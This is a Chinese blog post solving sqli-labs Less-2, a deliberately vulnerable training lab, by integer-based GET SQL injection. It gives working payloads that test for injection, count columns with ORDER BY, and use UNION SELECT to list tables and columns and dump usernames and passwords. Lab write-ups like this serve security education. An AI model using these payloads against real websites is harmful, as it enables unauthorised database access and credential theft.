[网络安全]sqli-labs Less-2 解题详析

[网络安全]Less-2 GET - Error based - Intiger based:基于错误的GET整型注入


往期回顾:[网络安全]sqli-labs Less-1 解题详析


判断注入类型

GET1 and 1=1,回显如下:
在这里插入图片描述
GET1 and 1=2,没有回显:
在这里插入图片描述说明该漏洞类型为整型注入。

判断注入点个数

GET1 order by 3,回显如下:
在这里插入图片描述GET1 order by 4,回显如下:
在这里插入图片描述说明注入点个数为3个
即可构造语句如下

-1' union select 1,2,xx form xx; --+

查库名

-1 union select 1,2,database(); --+

在这里插入图片描述

查表名

-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'; --+

在这里插入图片描述

查users表的列名

-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'; --+

在这里插入图片描述

查字段

-1 union select 1,group_concat(password),group_concat(username) from security.users; --+

在这里插入图片描述

注意

group_concat(password)的回显点在第二点上,对应回显页面中的Your Login name
group_concat(username)的回显点在第三点上,对应回显页面中的Your Password

除此之外,可以单独查询username和password,如下:

-1 union select 1,2,group_concat(username) from security.users; --+

在这里插入图片描述该页面回显即为用户名;


-1 union select 1,2,group_concat(password) from security.users; --+

在这里插入图片描述该页面回显即为密码。

总结

以上为[网络安全]sqli-labs Less-2 解题详析,后续将分享[网络安全]sqli-labs Less-3 解题详析
原理及姿势可参考:[网络安全]SQL注入原理及常见攻击方法简析
我是秋说,我们下次见。

本文作者:秋说

本文链接:https://www.cnblogs.com/qiushuo/p/17454570.html

版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。

posted @   秋说  阅读(28)  评论(0编辑  收藏  举报  
点击右上角即可分享
微信分享提示
评论
收藏
关注
推荐
深色
回顶
收起